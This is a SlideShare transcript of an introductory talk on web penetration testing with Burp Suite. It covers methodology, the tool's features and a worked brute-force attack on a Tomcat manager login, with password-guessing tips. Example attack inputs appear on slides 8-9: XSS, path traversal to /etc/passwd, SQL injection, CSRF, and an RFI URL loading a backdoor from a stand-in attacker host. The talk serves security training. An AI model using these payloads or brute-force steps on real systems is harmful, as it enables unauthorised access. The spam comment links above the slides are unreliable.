Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Hacking With Burp Suite 101

5,765 views

Published on

In this talk, we’ll walk through utilizing one of the most popular web vulnerability testing frameworks BurpSuite. During this presentation we will cover the process of how to conduct a successful web penetration tests, while utilizing BurpSuite's features and tools (Free and Pro Version). This discussion will also cover realistic examples and a brief overview of common vulnerabilities found in web applications.

Published in: Technology
  • Did you know that once you lose your Ex, there is still a good chance you can get them back? Learn how ♣♣♣ http://ishbv.com/exback123/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ➤➤ How Long Does She Want You to Last? Here's the link to the FREE report ▲▲▲ http://ishbv.com/rockhardx/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • //DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... //DOWNLOAD PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD PDF EBOOK here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD EPUB Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... //DOWNLOAD doc Ebook here { https://tinyurl.com/y8nn3gmc } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Web Hacking With Burp Suite 101

  1. 1. Introduction to Web App Pentesting & Burp Suite 101
  2. 2. Build | Protect | Learn Agenda 2 • $whoami • Overview of Web App Testing & Vulnerabilities • Burp Suite Overview • Getting Started With Burp Suite • Automated Testing • Manual Testing • Other Features in Burp • Manual Testing Mindset & Example • Additional Web Hack Tips N Tricks • Useful Resources & Conclusion
  3. 3. Build | Protect | Learn ~$ whoami 3 • InfoSec Geek • Pentester @ BreakPoint Labs (0xcc_labs) • Contributor to Primal Security Blog and Podcast • @b3armunch (Personal Infosec Twitter) • Certification Enthusiast (OSCP,GWAPT, GPEN, etc.) • I Love Knowing What’s Going On (emerging vulns, tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.
  4. 4. Build | Protect | Learn Full Disclosure! 4 • ALWAYS test what your about to learn in a lab environment or when you have permission! • What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite 
  5. 5. Build | Protect | Learn 5 I Promise NOOOOO…
  6. 6. Build | Protect | Learn Overview 6 • Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment. • Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment. - Burp Provides manual and automated testing capabilities. - Burp has a free and paid for version. (currently $349 per year) • Quick Note: Static vs. Dynamic Web Content Static Content: Informational web content that tends to lack user features and capabilities. Dynamic Content: Content that allows for user input to be passed to the server.
  7. 7. Build | Protect | Learn Web App Testing Methodologies 7 • Having an established testing methodology is an important first step. • Create Checklists and templates to reassure the assessments process. • Several great methodologies out there: Pentesting Execution Standard (PTES) OWASP Testing Guide (OTG) 4.0 Web Application Hackers Handbook Task Checklist • Any great methodology will include both Automated and Manual testing.
  8. 8. Build | Protect | Learn Common Web Vulnerabilities 8 • Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that executed client side (in the user’s web browser).  <script>alert(“hello”)</script> • Directory Traversal: Used by an attacker to gain unauthorized access to restricted directories and resources on the web server.  index.php?q=../../../../../etc/password • Cross-Site Request Forgery: An attack that forces an end user to execute unwanted actions on a web application that the end user is currently authenticated too.  http://testbank.com/transfer.php?acct=BadBob&amount=500 • Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a user to the manipulated parameter value without any input validation.  index.php?redirect=https://badboysite.com
  9. 9. Build | Protect | Learn Common Web Vulnerabilities 9 • SQL Injection: A form of code injection used against data driven applications with malicious SQL statements being inserted into a data entry field or parameter value for execution.  username: admin’– (Attempts to log you in as the admin user, with the rest of the SQL Query being ignored.) • Brute Force Attacks: A trial and error method used to obtain authentication to a web application. (username, password, pin, etc.) • Remote File Inclusion (RFI): The ability to include links to remote files through the exploitation of a vulnerable inclusion procedures implemented on the app.  http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php • Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly sanitized and an adversary can request a file located on the server through a web browser.
  10. 10. Build | Protect | Learn Web App Testing Procedure 10 1) Scoping: Laying the land through a questionnaire or conference call. (Always document though) 1) Recon & Mapping: What’s the size and technologies of the applications? (Spidering, Mapping and OSINT) 1) Automated Testing: Scan All The Things! (Utilizing Automated Scanners and open source testing tools too) 1) Manual Testing: Enumerate potential areas of interest and validated any automated tool findings (Abuse features, test injection points and reduce false positives) 1) Reporting: Essentially putting all your hard work into one document. 1) Remediation & Review: Provide support and re-testing of findings once remediated
  11. 11. Build | Protect | Learn Burp Suite Overview 11 Often Burp will be leveraged for its interception proxy capabilities. • Proxy: Intercept, Capture and Log Requests • Spider: Discover Linked Content • Scanner: Active Web App Vulnerability Scanner • Intruder: Automate your testing through injection points • Repeater: Take a request and manipulate it to analyze the response further • Sequencer: Analyze Tokens (Are they randomly generated?) • Encoder/Decoder: Take encode or decode strings (URL, Base64, HTML) • Comparer: Take two things and compare them side by side • Extender: TONS of extensions to expand the features in Burp
  12. 12. Build | Protect | Learn 12 • So Enough Talk….Let’s Actually Learn How to Use Burp! Let’s Begin
  13. 13. Build | Protect | Learn 13 Launching Burp • Burp Suite is a java jar file that can either be double clicked or run from the CLI. The following syntax can launch burp: java –jar –Xmx1024m burpsuite.jar
  14. 14. Build | Protect | Learn 14 Burps Proxy • Burps proxy is an intercepting proxy server that operates as a man-in-the-middle between your browser and the target web application.
  15. 15. Build | Protect | Learn 15 Setting Up Your Browser
  16. 16. Build | Protect | Learn 16 Burps Proxy Settings
  17. 17. Build | Protect | Learn 17 Common Issue….
  18. 18. Build | Protect | Learn 18 Define Your Scope
  19. 19. Build | Protect | Learn 19 Map Your App (Click through) • Understand the apps purpose • What Features are allowed? • Can you sign in? • View the Source • Observe the file and directory structure • What technologies are in use? (Wappalyzer) • Is information being displayed that I can control? • Does the app appear to interact with a database?
  20. 20. Build | Protect | Learn 20 Spider (Linked Content)
  21. 21. Build | Protect | Learn 21 Building Your Site Map The Site Map Tree View contains a hierarchical representation of content, with URLs broken down into domains, directories, files, and parameterized requests.
  22. 22. Build | Protect | Learn 22 Spider (Linked Content)
  23. 23. Build | Protect | Learn 23 Filter Content In Your Site Map
  24. 24. Build | Protect | Learn 24 Filtering Can Lead to… • Client side comments (Easter eggs the developer left behind!) • Email Addresses (Potential leveraged for logins) • Internal Path Disclosure • Unlinked Files or Paths • Potentially usernames and passwords (not very likely) • Technology Enumeration
  25. 25. Build | Protect | Learn 25 Analyze Your Target
  26. 26. Build | Protect | Learn 26 Target Analyzer Summary Static Content: Essentially content that could be considered “flat files”, meaning what you see is what you get! Often times static content is used to present end users news or information Dynamic Content: Allows for user interaction and communicates with “back end” or “server-side” requests from the application. Think of a search engine or login form.
  27. 27. Build | Protect | Learn 27 HTTP History & Comments
  28. 28. Build | Protect | Learn Automated Testing 28
  29. 29. Build | Protect | Learn 29 Automated Testing Will Miss Stuff • The DHS National NCATS organization reported that 67% of high impact vulnerabilities required manual testing to enumerate.
  30. 30. Build | Protect | Learn 30 Automated Testing Can Break Stuff
  31. 31. Build | Protect | Learn 31 Automated Testing Can Take a Long Time
  32. 32. Build | Protect | Learn 32 Automated Testing Can Have False Positives • Burp: Right-Click -> [Send to Repeater] [Request in Browser]
  33. 33. Build | Protect | Learn 33 Burps Automated Scan Wizard
  34. 34. Build | Protect | Learn 34 Burps Automated Scan Queue
  35. 35. Build | Protect | Learn 35 Burps Automated Scan Results
  36. 36. Build | Protect | Learn 36 Generate a Burp Scan Report
  37. 37. Build | Protect | Learn 37 Burp Automated Scan Report • Burp Scanner Report will include: Finding Issue Details, Severity, Confidence, Request, Response, etc...
  38. 38. Build | Protect | Learn Automated Testing 38
  39. 39. Build | Protect | Learn 39 Some Things To Think About • What technology is in use? • Ensure that you properly mapped the application • Enumerate all technology features (File upload, Comments, etc.) • Enumerate all areas of user input "Injection Points" • Can you figure what is being done with your input? • Is your input being presented on the screen? -> XSS • Is your input calling on stored data? -> SQLi • Does input generate an action to an external service? -> SSRF • Does your input call on a local or remote file? -> File Inclusion • Does your input end up on the file system? -> File Upload • Think OWASP Top TEN….
  40. 40. Build | Protect | Learn 40 OWASP Top Ten Snap Shot Source: https://www.owasp.org/index.php/Top_10_2013- Top_10
  41. 41. Build | Protect | Learn 41 Analyze Scan Results > Repeater (1)
  42. 42. Build | Protect | Learn 42 Test, Modify & Repeat
  43. 43. Build | Protect | Learn 43 Analyze Scan Results > Repeater (2)
  44. 44. Build | Protect | Learn 44 Verify Results (XSS Example - False Positive)
  45. 45. Build | Protect | Learn 45 Verify Results (XSS Example -Successful)
  46. 46. Build | Protect | Learn 46 Think About How Input Is Being Used Think about how to attack the following parameters and their values? http://example-site.com/index.php?redirect=/contact/contact-us.php http://example-site.com/index.php?file=/app/load.php http://example-site.com/index.php?name=zack http://example-site.com/index.php?search=exploitdb http://example-site.com/index.php?sql=SELECT * FROM USERS
  47. 47. Build | Protect | Learn 47 Burps Intruder
  48. 48. Build | Protect | Learn 48 Custom Fuzzing • FuzzDB, Raft Lists, and SecLists provide great lists for customer fuzzing. • As you start to understand how your input is being leveraged you can start your fuzzing in an automated manner. • Burp Suite Pro’s Intruder is my go to tool for web application fuzzing.
  49. 49. Build | Protect | Learn 49 Unlinked Content Treasures! • Use Burps Pre-Built Payload Lists for Fuzzing (Intruder Pro Version Only) • Use Commonly known lists from tools like Dirbuster or Wfuzz (We can enable Burp to add any new findings to our site map!) • Use the “SecLists” collection and it’s lists broken down by the following: - Passwords - Usernames - Discovery (Collection of general and specified directories/ resources) - Fuzzing (Collection of various payloads sorted by attack type) - Miscellaneous (Common Ports, Files extensions, list of US cities, etc.) - Pattern Matching (Good for the grep utility through file contents) - IOCs (Indicators of compromise [ Malicious domains, IPs, files, etc.) - New Feature: RobotsDisallowed (Disallowed directories from the robots.txt files of the world's top websites--specifically the Alexa 100K.) ^ Source: https://github.com/danielmiessler/SecLists
  50. 50. Build | Protect | Learn 50 Define Your Intruder Method • Sniper – Sends a single set of payloads to a selected parameter(s) value to identify vulnerabilities. • Battering Ram – Sends a single payload to all payloads marked at once. It iterates through the payloads, and places the same payload into all of the defined payload positions at once. • Pitchfork – Sends a specific payload to each of the selected parameters in sequence. Each area of interest is passed its own designated values in a sequenced series of requests. • Cluster Bomb – All payloads are tested with all the variables given meaning that all permutations of payload combinations are tested. (WARNING this is the largest and longest attack method often)
  51. 51. Build | Protect | Learn 51 Burps Intruder Set Your Position
  52. 52. Build | Protect | Learn 52 Define the Intruder Payload List
  53. 53. Build | Protect | Learn 53 Intruders Results (Status | Length) Note: You May Want to Uncheck Payload Encoding If not Needed!!!!
  54. 54. Build | Protect | Learn 54 Burp Pro’s Discover Content (Unlinked)
  55. 55. Build | Protect | Learn 55 Burps Discover Content Options
  56. 56. Build | Protect | Learn 56 Burps Discover Content Session Status
  57. 57. Build | Protect | Learn 57
  58. 58. Build | Protect | Learn 58 Burps Encoder/Decoder
  59. 59. Build | Protect | Learn 59 Burps Comparer Key: Modified | Deleted | Added
  60. 60. Build | Protect | Learn 60 Burps Sequencer
  61. 61. Build | Protect | Learn 61 Burps Extender
  62. 62. Build | Protect | Learn 62 Manual Testing Mindset & Example • Now let’s cover a basic example of how we can compromise a web application through several features that we can abuse!
  63. 63. Build | Protect | Learn 63 Weak Authentication Mechanism • Very common finding with web application penetration testing • Often combines several vulnerabilities: - Username enumeration (Low) + - Lack of Automation Controls (Low) + - Lack of Password Complexity Requirements (Low) = - Account Compromise (Critical)
  64. 64. Build | Protect | Learn 64 Weak Authentication: Username Enumeration • Password Reset Features “Email address not found” • Login Error Messages “Invalid Username” • Timing for login Attempts: Valid = 0.4 secs Invalid = 15 secs • User Registration “Username already exists” • Various error messages, and HTML source • Contact Us Features “Which Admin do you want to contact?” • Google Hacking and OSINT • Document Metadata • Sometimes the application tells you!
  65. 65. Build | Protect | Learn 65 Weak Authentication: Automation Controls • Pull the authentication request up in Burp’s Repeater and try it a few times. • If you see no sign of automation controls send to Burp’s Intruder for more aggressive testing. - No account lockout - No/Weak CAPTCHA - Main login is strong, but other resources are not (Mobile Interface, API, etc.)
  66. 66. Build | Protect | Learn 66 Weak Authentication: Weak Passwords • We as humans are bad at passwords…here are some tricks that work for me: - Password the same as username - Variations of “password”: “p@ssw0rd”… - Month+Year, Season+Year: summer2016… - Company Name + year - Keyboard Walks – PW Generator: “!QAZ2wsx” - My Favorites…Burp Pros Built in Wordlist or SecList Password Files • Lots of wordlists out there, consider making a targeted wordlist using CeWL (scrape sites for unique keywords). • Research the targeted user’s interests and build lists around those interests.
  67. 67. Build | Protect | Learn 67 Piecing Together What We Know… • We have enumerated that theirs a valid account named “tomcat” from the password reset functionality in the forms based login (Also a default account for Apache Tomcat). • The application also has basic authentication protecting its “ tomcat manager” login on port 8080 (No lockout built in and will need to base64 encode payloads). • We know theirs a lack of password complexity, since we made a test account with a password of “password”. (create account feature abuse) • Let’s leverage Burp’s Intruder to brute force…
  68. 68. Build | Protect | Learn 68 Manipulating Our Target Request 1. View our HTTP History Under the Proxy Tab. 2. Find our HTTP Request for the Tomcat ‘/manager/html’ login resource. 3. Send our request to Burps Intruder.
  69. 69. Build | Protect | Learn 69 Burp Intruder Payload Configuration 4. Add the § Payload Markers § around the Basic Authorization Value with the Sniper Attack.
  70. 70. Build | Protect | Learn 70 Analyze Your Encoded Payload To provider further context let’s decode our sample login attempt to the tomcat login > Send to Burps Decoder > Base64 Decode and we can see our attempt in plaintext. (i.e.) tomcat:password
  71. 71. Build | Protect | Learn 71 Burp Intruder Payload Set Up 5. Custom Iterator and Position 1 Set 6. Set Position 1 Separator “:” 7. Set Position 2 Password List
  72. 72. Build | Protect | Learn 72 Payload Processing Base64 Encode 8. Add a Payload Processing Rule > Encode > Base-64 Encode Your Payload > Properly submits our Brute Force Attempts!!!
  73. 73. Build | Protect | Learn 73 Start Intruder & Review Results 9. Look for a variance in your HTTP Status or Length of Response From Your Payload Attempts.
  74. 74. Build | Protect | Learn 74 ACHIEVEMENT UNLOCKED!!!!
  75. 75. Build | Protect | Learn 75
  76. 76. Build | Protect | Learn 76 Reconnaissance: Identify New Systems and Content • Companies are normally quite surprised about what is exposed to the Internet. • How do you tackle large /8’s, /16’s, how do you even build out this footprint starting with a company name? - Shodan + Censys.io (3rd Party DBs with Port/Service Info) - Domain + IP Research (Host, Dig, Whois, etc) - Masscan + Nmap (Identify open ports and services) - Whatweb + Wappalayzer (ID Tech Stack) - Google, Bing, etc. (Search Syntax) - OSINT: Company Mergers + Acquisitions (Expand Scope?)
  77. 77. Build | Protect | Learn 77 Big Scope? Quick Visual: Eye Witness • EyeWitness is a tool that takes in URLs and creates a report with server headers + Screen shot of the web GUI • Extremely useful when facing a large scope
  78. 78. Build | Protect | Learn 78 Don’t Judge a System By It’s IP • Requesting an application URL by IP might give back different content vs. the domain. • Load Balancing could exist to where an application could be mirrored across several IP addresses (Commonly seen with large sites i.e. banks). • Keep in mind you can have several applications living on the same IP (Virtual Hosting). • Pointing an automated tool to “http://ip/” may miss a lot of stuff vs. “http://ip/AppIsHere/”.
  79. 79. Build | Protect | Learn 79 Shot in The Dark “Nikto” Scan • Open Source web application vulnerability scanner that checks for low hanging fruit vulnerabilities and some old goodies. (False Positives will happen!)
  80. 80. Build | Protect | Learn 80 Version Specific Vulnerabilities • Enumerating the technology and version in use go a long way with finding vulnerabilities (Google + Exploit-db) • What do I know about the technology and how can I find more information?
  81. 81. Build | Protect | Learn 81 Build Your Own Custom Report • We leverage Markdown for Custom Reporting to give our reports in a HTML format. Common Findings Database - Check it out
  82. 82. Build | Protect | Learn 82 Useful Resources • CTFs: Vulnhub, Past CTF Writeups, Pentester Lab • Training: GWAPT , Offensive Security • Book: Web Application Hackers Handbook • Talk: How to Shot Web - Jason Haddix • Talk: How to be an InfoSec Geek - Primal Security • Talk: File in the hole! - Soroush Dalili • Talk: Polyglot Payloads in Practice - Marcus Niemietz • Talk: Running Away From Security - Micah Hoffman • Github Resource: Security Lists For Fun & Profit • BPL Blog Post on this Talk:
  83. 83. Build | Protect | Learn 83 Conclusion Email: zmeyers@breakpoint-labs.com • Burp Suite is a great baseline tool to leverage in all your future web assessments. • OWASP has a large abundance of information to reference and learn from. • Read blogs and twitter whenever possible, often times dozens of web vulnerabilities and potential exploits are released every day.

×